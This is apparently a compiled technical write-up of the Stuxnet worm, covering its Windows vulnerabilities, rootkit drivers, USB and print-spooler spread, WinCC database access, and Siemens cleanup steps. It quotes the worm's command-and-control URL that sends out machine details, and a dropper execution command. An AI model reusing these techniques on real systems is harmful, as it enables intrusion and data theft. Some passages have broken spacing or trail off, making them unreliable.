Stuxnet attackers and Windows zero-day exploits

STUXNET is a worm that initially made news in July due to its usage of certain vulnerabilities to propagate
and execute its routines. The media, as well as the security industry, has taken interest on this threat
since its emergence. This is primarily due to new findings suggesting that STUXNET is not just another
run-of-the-mill malware, but is instead one designed to target critical infrastructures. STUXNET has
three components that work in concert, a worm, an LNK file and a rootkit.

Stuxnet features:

Self-replicates through removable drives exploiting a vulnerability allowing auto-execution. It uses

Microsoft Windows Shortcut ‘LNK/PIF’ Files Automatic File Execution Vulnerability.

Spreads in a LAN through a vulnerability using Microsoft Windows Print Spooler Service

Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code
Execution Vulnerability.

Copies and executes itself on remote computers through network shares

Copies and executes itself on remote computers running a WinCC database serve

Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is
loaded.

Updates itself through a peer-to-peer mechanism within a LAN.

WORM_STUXNET – the worm executes all routines related to the main payload of the attack. It uses
certain vulnerabilities for its propagation and execution of certain routines. It implements a Microsoft
Remote Procedure Call to execute certain functions, enabling affected systems to communicate with one
another. It also tests for an active Internet connection on the affected system to communicate with a
remote server. It is also the component responsible for attempting to access a database consistent with
one used in Siemens WinCC systems.

LNK_STUXNET – this specially crafted .LNK file automatically executes the propagated copies of
WORM_STUXNET. It exploits vulnerability in the way Windows displays icons in shortcut files, and is
basically employed by STUXNET for automatic execution.

RTKT_STUXNET – this rootkit component is responsible mainly to hide all files and processes. This is
done in order to keep the infection from being traced by the user.

One reason STUXNET has become such a problem is it uses multiple means to propagate:

• First of all, it uses the MS10-046 Windows shortcut vulnerability (CVE-2010-2568), which
allowed it to spread via removable drives even if Auto run was disabled.

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland
 • Secondly, it used the MS08-067 vulnerability (CVE-2008-4250) to spread via the network the
same way DOWNAD/Conficker did.

• Thirdly, it used the MS10-061 Printer Spooler vulnerability (CVE-2010-2729) to spread via
networks, if a system was sharing a printer over the network.

Of these three vulnerabilities, the shortcut and spooler vulnerabilities were both unpatched at the
time of exploitation. All of these vulnerabilities have been patched, meaning that patched systems cannot
be easily infected. MS10-061 could only be used if anonymous users could use shared printers. By
default, this was the case in Windows XP, but not later versions of Windows. The shortcut vulnerability
was the most exploitable, as trying to access the removable drive in any way would have been sufficient
to trigger the vulnerability .

In addition, STUXNET uses two currently unpatched vulnerabilities in Windows to gain administrator rights on a
system. The Windows shortcut vulnerability only runs code with the same privileges as the current user; using
these two vulnerabilities ensures that this malware has the same rights as an administrator of the system.

STUXNET installs both server and client components for a Microsoft Remote Procedure Call in all infected
system by exploiting the MS08-067 vulnerability. This enables the affected system to execute the
following functions into any client that it can connect to:

• Get malware version

• Receive module and inject it

• Send the malware file

• Create a process that could be command shell or a file

• Create a file

• Delete a file

• Read a file

All affected systems are set to use the UUID (Universally Unique Identifier) UUID 000204e1-0000-0000-
c000-000000000046 . Using the said identifier enables systems affected by STUXNET to identify,
communicate and update one another

In attempting to connect with a remote server, STUXNET first tests for an active Internet connection by
connecting to the following non-malicious URLs:

• www.windowsupdate.com

• www.msn.com

After a connection is established, it then connects to the following URL(s) to send and receive commands
from a remote malicious user

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland
It then generates the following URL and posts it to the server:

• http://www.{BLOCKED}erfutbol.com/index.php?data={data}

Where {data} is an encrypted hex value that contains the IP address of the machine, computer
name, domain.

The Trend Micro™ Smart Protection Network™ protects against all components of the STUXNET threat.
The new web-based attacks (BSEO) are blocked using web reputation and all the file components are
detected using file reputation. The cloud-client architecture ensures all customers are protected
immediately, regardless of where users connect, from home, on the road or within their network.
Below are the files detected by Trend Micro:

• LNK_STUXNET.A

• LNK_STUXNET.AK

• LNK_STUXNET.C

• LNK_STUXNET.SM

The STUXNET worm itself is detected as:

• WORM_STUXNET.A

• WORM_STUXNET.AV

• WORM_STUXNET.SM.

The rootkit component is similarly detected as RTKT_STUXNET.A.

In addition, Trend Micro offers virtual patching for the vulnerabilities used in this attack with Deep
Security and OfficeScan with the Intrusion Defense Firewall plug-in, which are able to prevent network
propagation of STUXNET files. Also scans the system for certain processes which are related to security
software. It then attempts to inject itself into the said routines.
Once fully installed into the system, STUXNET exploits Siemens SIMATIC WinCC Default Password Security
Bypass Vulnerability to gain access to the back-end SQL database of WinCC SQL server.

The user login and the password for WinCC are freely definable and have nothing to do with access
to the internal database. The internal system authentication from WinCC to the Microsoft SQL database is
based on pre-defined access data. This data is not visible for the customer and is used as an internal
system mechanism for communication between the WinCC system components and the database.
Changing the access data would impede communication between WinCC and the database and is
therefore not recommended. Tightening up authentication procedures is being examined .
This enables the attacker of viewing the projects database and projects information from the WinCC
server. It can alter configuration settings and can access or delete the file %ALL USERS PROFILE%\sql
%05x.dbi. Since .DBI files are database explorer information files, this deletion is most likely done to
remove any trace of modification done by the malware in the database.

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland
The vulnerability could allow remote code execution if the icon of a specially crafted shortcut is

displayed. An attacker who successfully exploited this vulnerability could gain the same user rights as

the local user. Users whose accounts are configured to have fewer user rights on the system could be

less impacted than users who operate with administrative user rights.

The flaw affects all currently supported versions of Windows XP, Vista, Windows 7, Windows Server 2008

and Windows Server 2008 R2.

if the sys tem infected then it writte n to dis k, the followi ng :

The main Stuxnet payload .dll file is saved as Oem7a.pnf1.

A 90 byte data file copied to %SystemDrive%\inf\mdmeric3.PNF 2.

The configuration data for Stuxnet is copied to %SystemDrive%\inf\mdmcpq3.PNF3.

A log file is copied to %SystemDrive%\inf\oem6C.PNF

It can by- pass the secur ity sof twares using foll owing Cerificate Signature s:
The worm has some rootkit functionality, as during infection of the system it drops and installs two
kernel-mode drivers that allow it to hide files and inject code into process in the system:
MrxCls.sys and MrxNet.sys.

These modules are not packed or protected with any packer or protector. Moreover these drivers are
digitally signed. Here are the digital certificates of the public keys corresponding to the private keys used
to sign the driver.

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland
This driver (MRXCLS.SYS) is designated to inject code into the address space of the processes in the
system with name MRXCLS. It is registered in OS as a boot start service. Thus it is loaded as early as
possible in the OS boot process.

USB sticks with STUXNET :

Stuxnet also uses another trick to enhance the chances that it will be executed. The autorun commands
turn off autoplay and then add a new command to the context menu. The command that is added is
found in %Windir%\System32\shell32.dll,-8496. This is actually the “Open” string. Now when viewing the
context menu for the removable device the user will actually see two “Open” commands.

One of these Open commands is the legitimate one and one is the command added by Stuxnet. If a user
chooses to open the drive via this menu, Stuxnet will execute first. Stuxnet then opens the drive to hide
that anything suspicious has occurred.

Printer Spool er Vulnerabil ity :

Another way in which the worm replicates itself over the network exploits a vulnerability in Window
Spooler (MS10-061). Machines with file and printer sharing turned on are vulnerable to the attack. This
vulnerability results in privilege escalation allowing a remote user using a Guest account to write into
%SYSTEM% directory of the target machine.

The attack is performed in two stages: during the first stage the worm copies the dropper and additional
file into Windows\System32\winsta.exe and Windows\System32\wbem\mof\sysnullevnt.mof
respectively, while at the second stage the dropper is executed.

The first stage exploits the MS10-061 vulnerability. Under certain conditions the spooler improperly
impersonates a client that sends two “documents” for printing as we can see on the figure below.

These documents are “printed” to files in the %SYSTEM% directory while a user has Guest privileges that
shouldn’t entail access rights to the %SYSTEM% directory.

Networ k Shared Folders And RPC Vulnerabil ity:

The worm is also capable of distributing itself over the network through shared folders. It scans network
shares c$ and admin$ on the remote computers and installs a file (dropper) there with the name
DEFRAG<GetTickCount>.TMP, and schedules a task to be executed on the next day:

rundll.exe "C:\addins\DEFRAGdc2d0.TMP", DllGetClassObject

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland
Determi ne whether your Micros of t Wind ows computer is affected by the virus :

Use the Sysclean virus scan tool or the anti-virus programs approved by Siemens from TrendMicro,
McAfee or Symantec with the patterns from July 25, 2010 or more recent

IMPORTANT: Deactivate the "Automatically Clean Infected File

If a virus has been detected , please proce ed as foll ows:

Install the Microsoft Patch

Disconnect the computer from network immediately

Create a power user, but remain logged in with administrator rights to execute the tool SYSCLEAN and
the SIMATIC Security Update.

Clean the computer with "Sysclean" with the "Automatically Clean Infected Files" function activated

Install the Simatic Security Update

From this moment the computer must no longer be used with administrator rights

Reboot the computer.

Log in as power user

Carry out another virus scan with your installed virus scanner and leave the virus scanner to run
permanently.

Restore the computer back to the network.

The followi ng precauti onar y measures still apply:

All contacts with the outside world (customer data, USB devices, others) must be tested and cleaned.

Do not use, if possible, any third-party USB sticks and/or mobile data carriers.

Always check your safety concepts, e.g. deactivate/uninstall services that are not required.

It´s recommended to install the Microsoft Patch, for those operating systems, which are stated by
Microsoft.

“Stuxnet was undoubtedly created by professionals who’ve got a thorough grasp of

antivirus technologies and their weaknesses, as well as information about as yet unknown
vulnerabilities and the architecture and hardware of WinCC and PSC7”

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland